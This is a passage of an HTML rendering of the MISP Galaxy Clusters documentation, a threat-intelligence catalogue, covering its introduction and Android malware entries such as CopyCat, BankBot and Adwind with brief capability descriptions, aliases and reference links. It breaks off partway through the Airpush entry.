body.book #toc,body.book #preamble,body.book h1.sect0,body.book .sect1>h2{page-break-before:always}
.listingblock code[data-lang]:before{display:block}
#footer{background:none!important;padding:0 .9375em}
#footer-text{color:rgba(0,0,0,.6)!important;font-size:.9em}
.hide-on-print{display:none!important}
.print-only{display:block!important}
.hide-for-print{display:none!important}
.show-for-print{display:inherit!important}}
</style>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css">
</head>
<body class="article toc2 toc-right">
<div id="header">
<h1>MISP Galaxy Clusters</h1>
<div id="toc" class="toc2">
<div id="toctitle">MISP Galaxy Cluster</div>
<ul class="sectlevel0">
<li><a href="#_introduction">Introduction</a>
<ul class="sectlevel1">
<li><a href="#_funding_and_support">Funding and Support</a></li>
</ul>
</li>
<li><a href="#_misp_galaxy">MISP galaxy</a>
<ul class="sectlevel1">
<li><a href="#_android">Android</a></li>
<li><a href="#_banker">Banker</a></li>
<li><a href="#_botnet">Botnet</a></li>
<li><a href="#_branded_vulnerability">Branded Vulnerability</a></li>
<li><a href="#_cert_eu_govsector">Cert EU GovSector</a></li>
<li><a href="#_exploit_kit">Exploit-Kit</a></li>
<li><a href="#_microsoft_activity_group_actor">Microsoft Activity Group actor</a></li>
<li><a href="#_attack_pattern">Attack Pattern</a></li>
<li><a href="#_course_of_action">Course of Action</a></li>
<li><a href="#_enterprise_attack_attack_pattern">Enterprise Attack - Attack Pattern</a></li>
<li><a href="#_enterprise_attack_course_of_action">Enterprise Attack - Course of Action</a></li>
<li><a href="#_enterprise_attack_intrusion_set">Enterprise Attack -intrusion Set</a></li>
<li><a href="#_enterprise_attack_malware">Enterprise Attack - Malware</a></li>
<li><a href="#_enterprise_attack_relationship">Enterprise Attack - Relationship</a></li>
<li><a href="#_enterprise_attack_tool">Enterprise Attack - Tool</a></li>
<li><a href="#_intrusion_set">intrusion Set</a></li>
<li><a href="#_malware">Malware</a></li>
<li><a href="#_mobile_attack_attack_pattern">Mobile Attack - Attack Pattern</a></li>
<li><a href="#_mobile_attack_course_of_action">Mobile Attack - Course of Action</a></li>
<li><a href="#_mobile_attack_intrusion_set">Mobile Attack - intrusion Set</a></li>
<li><a href="#_mobile_attack_malware">Mobile Attack - Malware</a></li>
<li><a href="#_mobile_attack_relationship">Mobile Attack - Relationship</a></li>
<li><a href="#_mobile_attack_tool">Mobile Attack - Tool</a></li>
<li><a href="#_pre_attack_attack_pattern">Pre Attack - Attack Pattern</a></li>
<li><a href="#_pre_attack_intrusion_set">Pre Attack - intrusion Set</a></li>
<li><a href="#_pre_attack_relationship">Pre Attack - Relationship</a></li>
<li><a href="#_tool">Tool</a></li>
<li><a href="#_preventive_measure">Preventive Measure</a></li>
<li><a href="#_ransomware">Ransomware</a></li>
<li><a href="#_rat">RAT</a></li>
<li><a href="#_sector">Sector</a></li>
<li><a href="#_tds">TDS</a></li>
<li><a href="#_threat_actor">Threat actor</a></li>
<li><a href="#_tool_2">Tool</a></li>
</ul>
</li>
</ul>
</div>
</div>
<div id="content">
<h1 id="_introduction" class="sect0"><a class="anchor" href="#_introduction"></a><a class="link" href="#_introduction">Introduction</a></h1>
<div class="imageblock">
<div class="content">
<img src="https://raw.githubusercontent.com/MISP/MISP/2.4/INSTALL/logos/misp-logo.png" alt="MISP logo">
</div>
</div>
<div class="paragraph">
<p>The MISP threat sharing platform is a free and open source software helping information sharing of threat intelligence including cyber security indicators, financial fraud or counter-terrorism information. The MISP project includes multiple sub-projects to support the operational requirements of analysts and improve the overall quality of information shared.</p>
</div>
<div class="paragraph">
<p>MISP galaxy is a simple method to express a large object called cluster that can be attached to MISP events or attributes. A cluster can be composed of one or more elements. Elements are expressed as key-values. There are default vocabularies available in MISP galaxy but those can be overwritten, replaced or updated as you wish. Existing clusters and vocabularies can be used as-is or as a template. MISP distribution can be applied to each cluster to permit a limited or broader distribution scheme.
The following document is generated from the machine-readable JSON describing the <a href="https://github.com/MISP/misp-galaxy">MISP galaxy</a>.</p>
</div>
<div style="page-break-after: always;"></div>
<div class="sect1">
<h2 id="_funding_and_support"><a class="anchor" href="#_funding_and_support"></a><a class="link" href="#_funding_and_support">Funding and Support</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>The MISP project is financially and resource supported by <a href="https://www.circl.lu/">CIRCL Computer Incident Response Center Luxembourg </a>.</p>
</div>
<div class="paragraph">
<p><span class="image"><img src="https://www.misp-project.org/assets/images/logo.png" alt="CIRCL logo"></span></p>
</div>
<div class="paragraph">
<p>A CEF (Connecting Europe Facility) funding under CEF-TC-2016-3 - Cyber Security has been granted from 1st September 2017 until 31th August 2019 as <strong><strong>Improving MISP as building blocks for next-generation information sharing</strong></strong>.</p>
</div>
<div class="paragraph">
<p><span class="image"><img src="https://www.misp-project.org/assets/images/en_cef.png" alt="CEF funding"></span></p>
</div>
<div class="paragraph">
<p>If you are interested to co-fund projects around MISP, feel free to get in touch with us.</p>
</div>
<div style="page-break-after: always;"></div>
</div>
</div>
<h1 id="_misp_galaxy" class="sect0"><a class="anchor" href="#_misp_galaxy"></a><a class="link" href="#_misp_galaxy">MISP galaxy</a></h1>
<div class="sect1">
<h2 id="_android"><a class="anchor" href="#_android"></a><a class="link" href="#_android">Android</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Android malware galaxy based on multiple open sources..</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Android is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/android.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Unknown</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_copycat"><a class="anchor" href="#_copycat"></a><a class="link" href="#_copycat">CopyCat</a></h3>
<div class="paragraph">
<p>CopyCat is a fully developed malware with vast capabilities, including rooting devices, establishing persistency, and injecting code into Zygote a daemon responsible for launching apps in the Android operating system that allows the malware to control any activity on the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/">https://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_andr_dropr_fh"><a class="anchor" href="#_andr_dropr_fh"></a><a class="link" href="#_andr_dropr_fh">Andr/Dropr-FH</a></h3>
<div class="paragraph">
<p>Andr/Dropr-FH can silently record audio and video, monitor texts and calls, modify files, and ultimately spawn ransomware.</p>
</div>
<div class="paragraph">
<p>Andr/Dropr-FH is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GhostCtrl</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://nakedsecurity.sophos.com/2017/07/21/watch-out-for-the-android-malware-that-snoops-on-your-phone/">https://nakedsecurity.sophos.com/2017/07/21/watch-out-for-the-android-malware-that-snoops-on-your-phone/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.neowin.net/news/the-ghostctrl-android-malware-can-silently-record-your-audio-and-steal-sensitive-data">https://www.neowin.net/news/the-ghostctrl-android-malware-can-silently-record-your-audio-and-steal-sensitive-data</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_judy"><a class="anchor" href="#_judy"></a><a class="link" href="#_judy">Judy</a></h3>
<div class="paragraph">
<p>The malware, dubbed Judy, is an auto-clicking adware which was found on 41 apps developed by a Korean company. The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements, generating revenues for the perpetrators behind it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 3. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://fortune.com/2017/05/28/android-malware-judy/">http://fortune.com/2017/05/28/android-malware-judy/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/">https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redalert2"><a class="anchor" href="#_redalert2"></a><a class="link" href="#_redalert2">RedAlert2</a></h3>
<div class="paragraph">
<p>The trojan waits in hiding until the user opens a banking or social media app. When this happens, the trojan shows an HTML-based overlay on top of the original app, alerting the user of an error, and asking to reauthenticate. Red Alert then collects the user&#8217;s credentials and sends them to its C&amp;C server.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 4. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/researchers-discover-new-android-banking-trojan/">https://www.bleepingcomputer.com/news/security/researchers-discover-new-android-banking-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tizi"><a class="anchor" href="#_tizi"></a><a class="link" href="#_tizi">Tizi</a></h3>
<div class="paragraph">
<p>Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 5. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html">https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_doublelocker"><a class="anchor" href="#_doublelocker"></a><a class="link" href="#_doublelocker">DoubleLocker</a></h3>
<div class="paragraph">
<p>DoubleLocker can change the devices PIN, preventing victims from accessing their devices, and also encrypts the data requesting a ransom. It will misuse accessibility services after being installed by impersonating the Adobe Flash player - similar to BankBot.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 6. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/">https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_svpeng"><a class="anchor" href="#_svpeng"></a><a class="link" href="#_svpeng">Svpeng</a></h3>
<div class="paragraph">
<p>Svpeng is a Banking trojan which acts as a keylogger. If the Android device is not Russian, Svpeng will ask for permission to use accessibility services. In abusing this service it will gain administrator rights allowing it to draw over other apps, send and receive SMS and take screenshots when keys are pressed.</p>
</div>
<div class="paragraph">
<p>Svpeng is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Invisble Man</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 7. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/">https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.theregister.co.uk/2017/08/02/banking_android_malware_in_uk/">https://www.theregister.co.uk/2017/08/02/banking_android_malware_in_uk/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lokibot"><a class="anchor" href="#_lokibot"></a><a class="link" href="#_lokibot">LokiBot</a></h3>
<div class="paragraph">
<p>LokiBot is a banking trojan for Android 4.0 and higher. It can steal the information and send SMS messages. It has the ability to start web browsers, and banking applications, along with showing notifications impersonating other apps. Upon attempt to remove it will encrypt the devices' external storage requiring Bitcoins to decrypt files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 8. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://clientsidedetection.com/lokibot" class="bare">https://clientsidedetection.com/lokibot</a><em>_the_first_hybrid_android_malware.html[<a href="https://clientsidedetection.com/lokibot" class="bare">https://clientsidedetection.com/lokibot</a></em>_the_first_hybrid_android_malware.html]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bankbot"><a class="anchor" href="#_bankbot"></a><a class="link" href="#_bankbot">BankBot</a></h3>
<div class="paragraph">
<p>The main goal of this malware is to steal banking credentials from the victims device. It usually impersonates flash player updaters, android system tools, or other legitimate applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 9. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2017/09/19/a-look-into-the-new-strain-of-bankbot">https://blog.fortinet.com/2017/09/19/a-look-into-the-new-strain-of-bankbot</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://forensics.spreitzenbarth.de/android-malware/">https://forensics.spreitzenbarth.de/android-malware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.avast.com/mobile-banking-trojan-sneaks-into-google-play-targeting-wells-fargo-chase-and-citibank-customers">https://blog.avast.com/mobile-banking-trojan-sneaks-into-google-play-targeting-wells-fargo-chase-and-citibank-customers</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_viking_horde"><a class="anchor" href="#_viking_horde"></a><a class="link" href="#_viking_horde">Viking Horde</a></h3>
<div class="paragraph">
<p>In rooted devices, Viking Horde installs software and executes code remotely to get access to the mobile data.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 10. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.alwayson-network.com/worst-types-android-malware-2016/">http://www.alwayson-network.com/worst-types-android-malware-2016/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hummingbad"><a class="anchor" href="#_hummingbad"></a><a class="link" href="#_hummingbad">HummingBad</a></h3>
<div class="paragraph">
<p>A Chinese advertising company has developed this malware. The malware has the power to take control of devices; it forces users to click advertisements and download apps. The malware uses a multistage attack chain.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 11. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.alwayson-network.com/worst-types-android-malware-2016/">http://www.alwayson-network.com/worst-types-android-malware-2016/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf">http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ackposts"><a class="anchor" href="#_ackposts"></a><a class="link" href="#_ackposts">Ackposts</a></h3>
<div class="paragraph">
<p>Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 12. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-072302-3943-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-072302-3943-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wirex"><a class="anchor" href="#_wirex"></a><a class="link" href="#_wirex">Wirex</a></h3>
<div class="paragraph">
<p>Wirex is a Trojan horse for Android devices that opens a backdoor on the compromised device which then joins a botnet for conducting click fraud.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 13. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/">https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.zdnet.com/article/wirex-ddos-malware-given-udp-flood-capabilities/">http://www.zdnet.com/article/wirex-ddos-malware-given-udp-flood-capabilities/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wannalocker"><a class="anchor" href="#_wannalocker"></a><a class="link" href="#_wannalocker">WannaLocker</a></h3>
<div class="paragraph">
<p>WannaLocker is a strain of ransomware for Android devices that encrypts files on the device&#8217;s external storage and demands a payment to decrypt them.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 14. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://fossbytes.com/wannalocker-ransomware-wannacry-android/">https://fossbytes.com/wannalocker-ransomware-wannacry-android/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_switcher"><a class="anchor" href="#_switcher"></a><a class="link" href="#_switcher">Switcher</a></h3>
<div class="paragraph">
<p>Switcher is a Trojan horse for Android devices that modifies Wi-Fi router DNS settings. Swticher attempts to infiltrate a router&#8217;s admin interface on the devices' WIFI network by using brute force techniques. If the attack succeeds, Switcher alters the DNS settings of the router, making it possible to reroute DNS queries to a network controlled by the malicious actors.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 15. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.zdnet.com/article/this-android-infecting-trojan-malware-uses-your-phone-to-attack-your-router/">http://www.zdnet.com/article/this-android-infecting-trojan-malware-uses-your-phone-to-attack-your-router/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/">https://www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2017-090410-0547-99">https://www.symantec.com/security_response/writeup.jsp?docid=2017-090410-0547-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vibleaker"><a class="anchor" href="#_vibleaker"></a><a class="link" href="#_vibleaker">Vibleaker</a></h3>
<div class="paragraph">
<p>Vibleaker was an app available on the Google Play Store named Beaver Gang Counter that contained malicious code that after specific orders from its maker would scan the user&#8217;s phone for the Viber app, and then steal photos and videos recorded or sent through the app.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 16. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/malicious-android-app-steals-viber-photos-and-videos-505758.shtml">http://news.softpedia.com/news/malicious-android-app-steals-viber-photos-and-videos-505758.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_expensivewall"><a class="anchor" href="#_expensivewall"></a><a class="link" href="#_expensivewall">ExpensiveWall</a></h3>
<div class="paragraph">
<p>ExpensiveWall is Android malware that sends fraudulent premium SMS messages and charges users accounts for fake services without their knowledge</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 17. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/">https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://fortune.com/2017/09/14/google-play-android-malware/">http://fortune.com/2017/09/14/google-play-android-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cepsohord"><a class="anchor" href="#_cepsohord"></a><a class="link" href="#_cepsohord">Cepsohord</a></h3>
<div class="paragraph">
<p>Cepsohord is a Trojan horse for Android devices that uses compromised devices to commit click fraud, modify DNS settings, randomly delete essential files, and download additional malware such as ransomware.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 18. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/android-malware-variants/cepsohord">https://www.cyber.nj.gov/threat-profiles/android-malware-variants/cepsohord</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakem_rat"><a class="anchor" href="#_fakem_rat"></a><a class="link" href="#_fakem_rat">Fakem Rat</a></h3>
<div class="paragraph">
<p>Fakem RAT makes their network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 19. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf">https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99">https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gm_bot"><a class="anchor" href="#_gm_bot"></a><a class="link" href="#_gm_bot">GM Bot</a></h3>
<div class="paragraph">
<p>GM Bot also known as Acecard, SlemBunk, or Bankosy scams people into giving up their banking log-in credentials and other personal data by displaying overlays that look nearly identical to banking apps log-in pages. Subsequently, the malware intercepts SMS to obtain two-factor authentication PINs, giving cybercriminals full access to bank accounts.</p>
</div>
<div class="paragraph">
<p>GM Bot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Acecard</p>
</li>
<li>
<p>SlemBunk</p>
</li>
<li>
<p>Bankosy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 20. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.avast.com/android-trojan-gm-bot-is-evolving-and-targeting-more-than-50-banks-worldwide">https://blog.avast.com/android-trojan-gm-bot-is-evolving-and-targeting-more-than-50-banks-worldwide</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moplus"><a class="anchor" href="#_moplus"></a><a class="link" href="#_moplus">Moplus</a></h3>
<div class="paragraph">
<p>The Wormhole vulnerability in the Moplus SDK could be exploited by hackers to open an unsecured and unauthenticated HTTP server connection on the users device, and this connection is established in the background without the users knowledge.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 21. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securityaffairs.co/wordpress/41681/hacking/100m-android-device-baidu-moplus-sdk.html">http://securityaffairs.co/wordpress/41681/hacking/100m-android-device-baidu-moplus-sdk.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adwind"><a class="anchor" href="#_adwind"></a><a class="link" href="#_adwind">Adwind</a></h3>
<div class="paragraph">
<p>Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. Commands that can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. According to the author, the backdoor component can run on Windows, Mac OS, Linux and Android platforms providing rich capabilities for remote control, data gathering, data exfiltration and lateral movement.</p>
</div>
<div class="paragraph">
<p>Adwind is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>AlienSpy</p>
</li>
<li>
<p>Frutas</p>
</li>
<li>
<p>Unrecom</p>
</li>
<li>
<p>Sockrat</p>
</li>
<li>
<p>Jsocket</p>
</li>
<li>
<p>jRat</p>
</li>
<li>
<p>Backdoor:Java/Adwind</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 22. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/adwind-faq/73660/">https://securelist.com/adwind-faq/73660/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adsms"><a class="anchor" href="#_adsms"></a><a class="link" href="#_adsms">AdSms</a></h3>
<div class="paragraph">
<p>Adsms is a Trojan horse that may send SMS messages from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 23. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fortiguard.com/encyclopedia/virus/7389670">https://www.fortiguard.com/encyclopedia/virus/7389670</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-051313-4039-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-051313-4039-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_airpush"><a class="anchor" href="#_airpush"></a><a class="link" href="#_airpush">Airpush</a></h3>
<div class="paragraph">
<p>Airpush is a very aggresive Ad - Network</p>
</div>
<div class="paragraph">
<p>Airpush is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>StopSMS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 24. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
